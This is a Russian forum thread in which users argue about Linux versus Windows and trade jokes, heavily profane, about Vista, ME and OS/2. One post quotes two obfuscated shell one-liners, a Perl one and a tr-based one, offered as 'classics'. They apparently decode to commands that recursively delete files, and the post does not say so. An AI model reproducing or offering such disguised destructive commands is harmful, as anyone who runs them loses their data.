Установил linux... и понеслось

Страницы: 1 ...  19 20 21  ... 43  ОТВЕТИТЬ НОВАЯ ТЕМА
dz1402 12 дек 2017 в 18:01
Весельчак  •  На сайте 9 лет
-1
Пока настраивал на линуксе принтер по сети, понял, что ну его нах. Установил 7-ку и не парюсь. Вот вообще не мое. Что вы в этом линуксе нашли??
blow05 12 дек 2017 в 18:02
Моргенмуффель  •  На сайте 15 лет
1
Цитата (donc @ 12.12.2017 - 16:54)
Цитата (blow05 @ 12.12.2017 - 17:48)

всего то в 5 раз меньше фоток... и да, не увидел возможность поставить рамки на изображения, но я его не запускал (негде). в любом случае - нагугли, скачай (чтоб без вируса), натыкай мышкой... гораздо удобнее, когда есть 1 инструмент для этой задачи, с которым 1 раз разбираешься, потом за 3-5 минут находишь в man-e нужные опции и запускаешь. и знаешь, что у него интерфейс каждые пол года меняться не будет.... в общем - что ни говори, но есть очень большой пласт задач, в которых консоль удобнее GUI

не нашел, значит визин в помощь :)
без вируса внезапно на оффсайте качается
не обновляй и не будет меняться.

Есть огромный пласт задач, я разве спорю - напрмер php удобнее в линкусе, нежели городить на масдае огороды с денвером, который еще и запускать надо каждый раз от админа (в мануалах этого нет)

Вроде ушел же я..

ок, ты запустил и нашел. мне запускать негде и нужды нет.

а теперь - внимание вопрос. как нагуглить именно этот инструмент, в котором всё есть и он не вылетает среди сотни других таких же, но которые либо не всё умеют, либо отказываются работать?

P.S. а по поводу не обновляй - зачет... у меня какбэ весь софт централизовано обновляется. Не, я могу конечно запретить обновлять любой пакет, но обычно этого не делаю.

Это сообщение отредактировал blow05 - 12 дек 2017 в 18:03
TPbpKoWKjoih 12 дек 2017 в 18:02
Весельчак  •  На сайте 11 лет
2
Цитата (dz1402 @ 12.12.2017 - 18:01)
Что вы в этом линуксе нашли??

Хорошее, годное ядро. Что там еще найти можно?
Toos 12 дек 2017 в 18:03
Балагур  •  На сайте 14 лет
-6
линуксоводы как веганы ей богу ....

VampirBFW 12 дек 2017 в 18:04
Главный Сапиосексуал Япа.  •  На сайте 16 лет
6
Цитата (Toos @ 12.12.2017 - 18:03)

Эмм, вы зашли в тему для линуксоидов, что выделено в начале, и утверждаете что МЫ навязываем свое мнение?? Понимаете если стоит пачка людей и обсуждает шашлык, над ними здоровый плакат с надписью "МЫ ЛЮБИМ ШАШЛЫК" и к ним кто то подходит и начинает говорить ЕБАТЬ ВЫ УПОРОТЫЕ, мясо говно вы долбоебы, то упоротые тут не те кто шашлык обсуждают, а тот кто со своим уставом в чужой монастырь полез.
djmodesto 12 дек 2017 в 18:06
кавалер ордена бани  •  На сайте 12 лет
4
Цитата (VampirBFW @ 12.12.2017 - 18:04)

Эмм, вы зашли в тему для линуксоидов, что выделено в начале, и утверждаете что МЫ навязываем свое мнение?? Понимаете если стоит пачка людей и обсуждает шашлык, над ними здоровый плакат с надписью "МЫ ЛЮБИМ ШАШЛЫК" и к ним кто то подходит и начинает говорить ЕБАТЬ ВЫ УПОРОТЫЕ, мясо говно вы долбоебы, то упоротые тут не те кто шашлык обсуждают, а тот кто со своим уставом в чужой монастырь полез.

он просто завидует gigi.gif
Myth 12 дек 2017 в 18:06
Ярила  •  На сайте 12 лет
-1
Цитата (TPbpKoWKjoih @ 12.12.2017 - 20:58)
Цитата (Myth @ 12.12.2017 - 17:50)
Можно красивей сделать. Но под вечер после пива извилинами шевелить лень.

Даешь perl-однострочник! lol.gif

Раз уж пошла такая пьянка -
Классика
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Можно еще так:
ISF=$(echo '%\%#{<-{}<&{`' |tr ' -/:-@[-`{}' '`-{/ -');$ISF 2>/dev/null

Но оба причесать надо.

Это сообщение отредактировал Myth - 12 дек 2017 в 18:09
TPbpKoWKjoih 12 дек 2017 в 18:08
0

Безусловно есть и такие которым нужен "линукс ради линукса". Что тут поделать. :)
TPbpKoWKjoih 12 дек 2017 в 18:12
0
Цитата (Myth @ 12.12.2017 - 18:06)

Классика

Можно еще так:

Но оба причесать надо.

И запостить на ЛУРК!
ХИТРОПОПОВЕЦ 12 дек 2017 в 18:12
Приколист  •  На сайте 11 лет
2

shum_lol.gif а в темах про виндовс вас нет
первый же коммент "виндовс гавно,я на линуксе" lol.gif

Это сообщение отредактировал ХИТРОПОПОВЕЦ - 12 дек 2017 в 18:14
VampirBFW 12 дек 2017 в 18:15
3
Цитата (ХИТРОПОПОВЕЦ @ 12.12.2017 - 18:12)

Представляете так как я одмин и в темах про винду я есть. А вот в темах про танки меня нет. Я не играю в танки, мне на них похуй, я не играю в вартандер, меня нет в темах про вартандер. Я не смотрю телевизер, меня нет в темах про телепрограммы. Я не употребляю алкоголь, меня нет в темах про алкоголи и способы его употребления - приготовления. И можно мне ссылку на мои слова "виндовс говно"?

Это сообщение отредактировал VampirBFW - 12 дек 2017 в 18:17
Myth 12 дек 2017 в 18:15
-1
Цитата (TPbpKoWKjoih @ 12.12.2017 - 21:12)
Цитата (Myth @ 12.12.2017 - 18:06)

Классика

Можно еще так:

Но оба причесать надо.

И запостить на ЛУРК!

Так оттудова и спиздено Свое - это надо сервак пинать, в гит лезть...
Thremere 12 дек 2017 в 18:15
Шутник  •  На сайте 12 лет
0
Познакомился с Убунту, когда ноутбук начал умирать, а денег на новый не было. Для винды не хватало питания при старте, и она не запускалась. Потом перебрался на Линукс Минт.
Сейчас уже собрал нормальный компьютер по частям и поставил две системы на него. Угадайте с первого раза, какая ОС в ходу? Конечно же Линукс! Виндовс в свою очередь используется лишь для работы в программах, для которых нужен физический ключ защиты, поддержка которого в обычном Вайн не реализована до конца.
И да, отрастил свитер а за одно и бороду
TPbpKoWKjoih 12 дек 2017 в 18:16
3

Напомнило: Среднестатический пользователь Android тратит по 18 минут в неделю, объясняя почему он купил не iPhone.
ХИТРОПОПОВЕЦ 12 дек 2017 в 18:21
Приколист  •  На сайте 11 лет
2

говоря ВАС я не имел ввиду именно вас cool.gif

Это сообщение отредактировал ХИТРОПОПОВЕЦ - 12 дек 2017 в 18:22
donc 12 дек 2017 в 18:23
Гость  •  На сайте 9 лет
-1

Я вот лично зашел в тему шпал нахватать потому что у меня оный стоит на одном из 4-компов.

Да, он шустрее на слабых компах, для этого и ставил собственно, хотя старая тормозилла как тормозила, так и тормозит.

Но половины нужных программ там нет, аналоги объектно в большинстве - неудобнее, и привыкать ним надо

Запуск под вайном не всегда все решает - но вы же не пробовали и не сравнивали на алогичном железе.

Да - на линукс не нужен антвирь и это радует (хотя в масдае надо просто не работать под админом, но кого это ебет?)

Поэтому для более мощного железа- виндоуз 7 мой выбор однозначный.

виндоуз 8 и 10 вообще идут в сад - это такое дерьмо, что врагу не пожелаешь
Хотя врагу можно пожелать висту.

Надо быть просто объективными, но вы реально УПОРОТЫЕ - для вас линупс это великий Бог и иных мнений быть не может, что вы тут мне и доказали в очередной раз.
TPbpKoWKjoih 12 дек 2017 в 18:25
5
Еще раз выскажу свое ИМХО:

1. Если есть железо или софт которое не поддерживается Linux и нет особого желания сношаться (возможно даже безрезультатно) с wine/виртуалками/удаленками НЕ НУЖНО его ставить. Это глупо как минимум.

2. Если нет желания много читать на языке вероятного противника, разбираться как работают чужие скрипты и то что лучшая документация - исходник, тоже не нужно. Совсем. Не мучайте себя.

И да линукс не видна, сломал - чини, переставлять моветон! deg.gif
VampirBFW 12 дек 2017 в 18:25
4
Как мне нравятся рассуждения "Виста зло, виста фигня" многоуважаеммые, поймите ВЫ НЕ ЗНАЕТЕ что такое по настоящему хуевая ОС. Вы не застали линолеум. виндос линолеум, ВОТ где был адовый пиздец с ушами, вот где рандом не то что правил бал, а млять был основоположником ядра. вот где вы нихуя не знали с чего начнется ваш день. Я после того как на фирму купили 6 линолеумов реально не знал с чего начнется утро. Вы могли прийти на работу, и оказалось что вчера эта хуерга скачала себе обновы и теперь в ней текст крякозябрами. Во время обновления она могла СПОКОЙНО выполнить команду выключения, и отрубится к хуям САМА, с вырезанными системными файлами. Тренды обсуждали в фидо о линолеуме занимали наверное террабайты в те времена. Сама майкрософт меньеш чем за год сказало что не будет плить это говно до ума, ибо оно с рождения ебнуто в хлам.

Это сообщение отредактировал VampirBFW - 12 дек 2017 в 18:31
BattlePorQ 12 дек 2017 в 18:26
Парасьонах  •  На сайте 16 лет
1
Цитата (donc @ 12.12.2017 - 18:23)
Надо быть просто объективными, но вы реально УПОРОТЫЕ - для вас линупс это великий Бог и иных мнений быть не может, что вы тут мне и доказали в очередной раз.

Никаких богов. Просто инструмент, такой же, как Windows, но лично для меня более удобный. Потому и пользуюсь. Вот и всё.
Myth 12 дек 2017 в 18:29
0
Цитата (donc @ 12.12.2017 - 21:23)

Хотя врагу можно пожелать висту.

Хочешь действительно хапануть дерьмеца тазиком - линолеум или полуось тебе в зубы.

По поводу вендосрачей моя ИМХА - почму то с красноглазыми обычно в спор вступают именно вантузятники. Толи комплксы их дрочат толи ееще чего. Маководы - спокойненько стоят в сторонке с эмоцией "Мне похуй, у меня всё работает, сли это не работает - мне это нахуй не надо" на ебле. А... Забыл c какой-то версии их кошачьи - это генномодифицированная фряшка на синтоле и стероидах...

Это сообщение отредактировал Myth - 12 дек 2017 в 18:34
donc 12 дек 2017 в 18:31
Гость  •  На сайте 9 лет
2
Цитата (VampirBFW @ 12.12.2017 - 18:25)
Как мне нравятся рассуждения "Виста зло, виста фигня" многоуважаеммые, поймите ВЫ НЕ ЗНАЕТЕ что такое по настоящему хуевая ОС. Вы не застали линолеум. виндос линолеум, ВОТ где был адовый пиздец с ушами, вот где рандом не то что правил бал, а млять был основоположником ядра. вот где вы нихуя не знали с чего начнется ваш день.

милениум помню начальнику поставил, в качестве мсти.. Ох он и матерился.
Я еще 95 застал и 3.11

И да, день начинался с установки 95 и накатывания на него ИЕ2, глючного, как какой-то адовый пиздец
АМАЛКЕР 12 дек 2017 в 18:32
Шпаломётчик  •  На сайте 13 лет
1
Х.з.
Пользую Убунту дома, у ребенка тоже Убунту.
ЧПУшным фрезером и пенорезом рулит тоже старая Убунту на древнем как говно мамонта компе.
И еще есть в мастерской Видус ХР, сугубо для Корела, т.к. современные дизайнеры ни могут осилить сложнейшую науку сохранения векторного файла в формате ".cvg", и для программки девфоам, которая генерит Г-коды для пенорезки, к сожалению ничего пенорезного на линуксе я пока не нашел...
Игрушек, кстати, в Стиме дохрена линуксовых.

Это сообщение отредактировал АМАЛКЕР - 12 дек 2017 в 18:33
VampirBFW 12 дек 2017 в 18:32
1
Цитата (donc @ 12.12.2017 - 18:31)
Цитата (VampirBFW @ 12.12.2017 - 18:25)
Как  мне нравятся рассуждения "Виста зло, виста фигня" многоуважаеммые, поймите ВЫ НЕ ЗНАЕТЕ что такое по настоящему хуевая ОС. Вы не застали линолеум. виндос линолеум, ВОТ где был адовый пиздец с ушами, вот где рандом не то что правил бал, а млять был основоположником ядра. вот где вы нихуя не знали с чего начнется ваш день.

милениум помню начальнику поставил, в качестве мсти.. Ох он и матерился.
Я еще 95 застал и 3.11

И да, день начинался с установки 95 и накатывания на него ИЕ2, глючного, как какой-то адовый пиздец

он матерился, я это АДМИНИЛ и включал в домен на базе 2000 сервера. Это был сука ад. Я наверное даже во сне просыпался в холодном поту. Возможно эт овремя и оттолкнуло меня от маздая.

Это сообщение отредактировал VampirBFW - 12 дек 2017 в 18:33
TPbpKoWKjoih 12 дек 2017 в 18:33
0
Цитата (Myth @ 12.12.2017 - 18:29)
Хочешь действительно хапануть дермеца тазиком - линолеум или полуось тебе в зубы.

Э! Что там не так с OS/2? mad.gif Лично для меня от Win2000 и выше - ЗБС. Но каждая версия на свою, так сказать, "эпоху".

Правда я 10-ку только в LTSB редакции использую. Ну то такое.
BrokenAngel 12 дек 2017 в 18:34
Шутник  •  На сайте 17 лет
1
Резюмирую.

Понравился пост? Ещё больше интересного в ЯП-Телеграм и ЯП-Max!
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей) Просмотры темы: 103 508
0 Пользователей:
Страницы: 1 ...  19 20 21  ... 43  ОТВЕТИТЬ НОВАЯ ТЕМА

Активные темы

Наверх